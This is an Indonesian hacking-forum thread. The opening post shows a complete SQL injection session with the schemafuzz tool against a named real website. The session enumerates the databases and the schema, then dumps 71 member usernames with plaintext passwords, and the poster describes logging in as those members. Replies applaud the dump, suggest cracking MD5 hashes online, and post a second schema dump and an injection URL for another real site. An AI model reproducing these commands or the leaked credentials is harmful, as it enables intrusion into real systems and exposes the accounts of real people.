SQLi pake Schemafuzz

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SQLi pake Schemafuzz

Post by anja_indie » Sat Jun 13, 2009 1:33 am

site'a malingshit...

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561 --findcol

| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |

[+] URL: http://ccs.my/news.php?id=1561--
[+] Evasion Used: "+" "--"
[+] 06:15:17
[-] Proxy Not Given
[+] Attempting To find the number of columns...
[+] Testing: 0,1,2,3,4,5,
[+] Column Length is: 6
[+] Found null column at column #: 1
[+] SQLi URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] darkc0de URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5
[-] Done!

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dbs

| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:17:31
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0] ccs_myccs
[1] test

[-] 06:17:50
[-] Total URL Requests 4
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --schema -D ccs_myccs

| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:19:09
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Showing Tables & Columns from database "ccs_myccs"
[+] Number of Tables: 36

[Database]: ccs_myccs
[Table: Columns]

[0]addressbook: id,cat_id,cat_id2,cat_id3,update_date,submit_date,name,person,ic,gender,add1,add2,add3,tel,hp,fax,username,password,email,note
[1]addressbook_cat: id,sub_id,name
[2]addressbook_pc: id,add_id,submit_date,name,cpu,ram,hd,vga,sound,cdrom,drive,keyboard,mouse,usb,port,networking,os,antivirus
[3]addressbook_pc_report: id,add_id,submit_date,name,note
[4]cat: id,name,image,visit,bodytag,keyword,desc,description
[5]consignment: id,customer_id,borrow,name,user
[6]enquiry: user_id,area_id,update_date,submit_date,company,name,gender,add1,add2,postcode,home,office,fax,mobile,email,ic,passport,nationality,os,dealer,note
[7]enquiry_area: id,parent_id,top_id,name
[8]faq: id,cat_id,question,answer
[9]faqcat: id,name,visit,description
[10]hosting: id,update_date,name,owner,dealer,server_id,expire,price,note
[11]hostingserver: id,name
[12]invoice_item: id,invoice_id,update_date,submit_date,name,description,qty,price
[13]logs: id,date,name,description
[14]logs_hr: id,date,name,description
[15]member: id,area_id,update_date,submit_date,company,name,gender,add1,add2,username,office,fax,password,email,level,note,staff,dealer,hosting,member
[16]member_leave: id,member_id,update_date,submit_date,leave_date,name,status,note,total_day
[17]member_report: id,member_id,update_date,submit_date,report_date,name,report,total_hour
[18]member_sales: id,member_id,sales_id,update_date,submit_date,sales_date,account_date,bankin_date,name,note,payment,price,cost,profit
[19]member_task: id,customer_id,member_id,leader_id,access_id1,access_id2,access_id3,update_date,submit_date,followup_date,complete_date,name,status,note
[20]member_task_report: id,member_id,task_id,update_date,submit_date,note,time
[21]member_type: id,parent_id,top_id,name
[22]news: id,name,description,submit_date,update_date,visit
[23]package: id,name
[24]package_item: id,package_name_id,product_id
[25]package_name: id,package_id,name
[26]payment: id,update_date,submit_date,invoice_date,name,note,total,sold,paid
[27]po: id,customer_id,update_date,submit_date,name,username
[28]po_item: id,po_id,update_date,name,description,qty,retail,price,note,username
[29]products: id,date1,visit,name1,name2,weight,cat1,cat2,type1,type2,description,image1,image2,price,price_us,offer,dealer,wholesale,cost,note,seller,bodytag,code,date2,date3,stock,stock1,stock2,stock3
[30]products_reserve: id,product_id,customer_id,update_date,submit_date,name,taken_date,username
[31]quotation: id,cat_id,customer_id,dealer_id,update_date,submit_date,quotation_date,invoice_date,po_date,name,invoice,username,remark,regards
[32]quotation_cat: id,sub_id,name
[33]quotation_item: id,quotation_id,update_date,name,description,qty,price,cost,note,username
[34]stock: id,product_id,update_date,submit_date,name,username,log
[35]type: id,name,image,visit,bodytag

[-] 06:45:44
[-] Total URL Requests 315
[-] Done

Don't forget to check schemafuzzlog.txt

root@bt:/mnt/SuSE/home/biohazards/Desktop# python schemafuzz.py -u http://ccs.my/news.php?id=1561+AND+1=2+ ... de,2,3,4,5 --dump -D ccs_myccs -T member -C id,username,password

| rsauron[@]gmail[dot]com v5.0 |
| 6/2008 schemafuzz.py |
| -MySQL v5+ Information_schema Database Enumeration |
| -MySQL v4+ Data Extractor |
| -MySQL v4+ Table & Column Fuzzer |
| Usage: schemafuzz.py [options] |
| -h help darkc0de.com |

[+] URL: http://ccs.my/news.php?id=1561+AND+1=2+ ... ,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 06:51:41
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: ccs_myccs
User: ccs_myccs@localhost
Version: 5.0.51a-community
[+] Dumping data from database "ccs_myccs" Table "member"
[+] and Column(s) ['id', 'username', 'password']
[+] Number of Rows: 71

[0] 1:cwtan:213:
[1] 2:fkyoon:jk45gb:
[2] 3:xtremecom:hasegawa:
[3] 4:kevinloh:nbv354:
[4] 5:jasonwong:vgb54n:
[5] 20:jeffery_yeoh:sc8bq1:
[6] 7:gtlau:fv62bx:
[7] 8:johan:ndxm532:
[8] 9:mohamed:hdx43n:
[9] 10:johnathan:jsch82d:
[10] 11:jamesgoh:s45xh2:
[11] 34:sean:dsc23:
[12] 13:phchan:ph118:
[13] 14:pccmy:suc51f:
[14] 23:ckphuah:s45f8:
[15] 15:cg-computers:hdxe45:
[16] 16:armen:h2dz52:
[17] 17:matthew:sc25x3:
[18] 18:kyzee:ds5jk7:
[19] 19:george:dh9n2m:
[20] 31:wooijin:wooijin:
[21] 22:raymond-liew:sf28b:
[22] 24:andrewgark:sc19nv:
[23] 25:jamil:sdc739:
[24] 26:irene_tew:kxn349:
[25] 27:chenlung:xun329:
[26] 28:ericlim:un39xv:
[27] 29:tradewinds:sdcb348:
[28] 30:myben:830712b:
[29] 32:brian:jxn267:
[30] 39:elongnet:ds5x8:
[31] 40:shabbir:scvs321h:
[32] 41:evergreen:sdfx125:
[33] 43:raymondlee:xh37b3:
[34] 44:cheryl:bds518:
[35] 45:gadgetzone:asd24h:
[36] 46:dmitri:gb536:
[37] 47:syedali:21gh4:
[38] 48:level3:213:
[39] 49:izmir:hgd752:
[40] 50:izwan:fhdr352:
[41] 51:ooigheetiong:njds641:
[42] 52:thenoiho:dsh629k:
[43] 53:desai:kdie83:
[44] 54:giapseng:sx4k8:
[45] 55:lionel:lionel6:
[46] 56:adrain:
[47] 57:iscc:nhfd63:
[48] 58:rovinlim:sdx413:
[49] 59:maxlee:fkpq134:
[50] 60:syukri:t5u7w2:
[51] 61:jaclyn:vgx216:
[52] 62:davidteoh:tr431k:
[53] 63:yeapch:dx164:
[54] 64:adrianquah:fgzu72:
[55] 65:jameskuick:sg623k:
[56] 66:raymondooi:she369:
[57] 67:cgcomputers:gxk518:
[58] 68:yckai:jh763:
[59] 80:lltan:x41jk8:
[60] 70:kltan:sdk327:
[61] 71:myitech:hgk967:
[62] 72:vss:fxs523:
[63] 73:atconsulting:sc42h6:
[64] 74:skfcomp:sd15h6:
[65] 75:hjwang:crdy483:
[66] 76:cheoh:peb357:
[67] 77:saidatul:sdt528:
[68] 78:shofi:sx39n43:
[69] 79:dynacomb:x4f5k2:
[70] 81:lltan:x41jk8:
[71] No data

[-] 06:55:38
[-] Total URL Requests 73
[-] Done

Don't forget to check schemafuzzlog.txt

register jadi member'a...
(soal'a halaman login bwt member d sembunyiin)
trus login sebagai member yg username 'n password'a dah kita dpt itu...

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Re: SQLi pake Schemafuzz

Post by Bi4kKob4r » Sat Jun 13, 2009 1:49 am

hmm... nice show up :D
I think just : Make better than the best

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Love is Feeling,
Feeling is your heart,
Heart Controlling By your brain.

Always INject your brain with the greatest knowledges.

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Re: SQLi pake Schemafuzz

Post by bernadsatriani » Sat Jun 13, 2009 10:40 am

buset dah...
dumping DB user :D

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Re: SQLi pake Schemafuzz

Post by N4ck0 » Sat Jun 13, 2009 10:46 am

nice bro
itu kan webnya g terencript md5 yah
nah klo schemafuzz baru dari darkc0de
bia langsung crack tu hash

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Re: SQLi pake Schemafuzz

Post by ji_bog » Sat Jun 13, 2009 10:17 pm

makasih master atas share nya ;)
soal nya belom pernah pake yang beginian hehehe ;)
sekali lagi thanks for share 8)
signatur saya begini aja deh :D

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Re: SQLi pake Schemafuzz

Post by th3r00t » Mon Jun 15, 2009 4:54 pm

wedew itu kagak di enkrip :D
parah bener tuh site :lol:
Salam kenal dari seorang nyubie,
www.c0mrade.co.cc | www.c0mr4d3.uni.cc

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Re: SQLi pake Schemafuzz

Post by wiLMaR_kiDz » Mon Jun 15, 2009 6:05 pm

gk trenkripmd5...parah dah.... ;) ;)
ordinary user,-

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Re: SQLi pake Schemafuzz

Post by bernadsatriani » Wed Jun 17, 2009 1:26 pm


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Re: SQLi pake Schemafuzz

Post by anja_indie » Wed Jun 17, 2009 5:27 pm

klo terenkrip MD5 mah..tinggal d decrypt ajah...
kan ada fastcrack ato MD5 decryptor yg online.....


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Re: SQLi pake Schemafuzz

Post by shad.hckr » Fri Jun 19, 2009 9:48 pm

[+] Gathering MySQL Server Configuration...
Database: ukcds
User: ukcds@localhost
Version: 5.0.22-Debian_0ubuntu6.06.2-log
[+] Starting current users database extraction...

[Database]: ukcds

[Table: Columns]
[0]countries: id,country,country_code,zone_id
[1]document: document_id,document_reference,document_title,document_publish_date
[2]document_type: document_type_id,document_type,display_sequence
[3]event: event_id,event_title,event_date,event_end_date,event_times,event_statu
[4]event_bookings: event_booking_id,event_id,title,name,organisation,address,pos
[5]event_document: event_document_id,event_id,document_id,link_title
[6]event_type: event_type_id,event_type,display_sequence
[7]mail_list: email,name,last_modified_date
[8]members: member_id,member_acronym,member_name,member_body,member_image,member
[9]news: news_id,news_type_id,news_title,news_image,news_image_caption,news_imag
[10]news_type: news_type_id,news_type,news_status,order_by,page_id,display_seque
[11]pages: page_id,page_status,page_type,cms_page_type,menu_parent,menu_type,men
[12]person: person_id,person_title,person_first_name,person_surname,person_quali
[13]position: position_id,position_name,position_sequence
[14]project: project_id,project_type_id,project_title,project_image,project_imag
[15]project_type: project_type_id,project_type,order_by,page_id,display_sequence

[16]site: site_id,site_status,site_closed_message,default_page_title,default_met
[17]site_old: site_id,site_status,site_closed_message,default_page_title,default
[18]user_log: log_id,user_id,action,action_time
[19]users: user_id,name,email,password,last_logged_in

[-] Done
Don't forget to check database.txt

http://www.ukcds.org.uk/pages.php?page= ... rom+users/*

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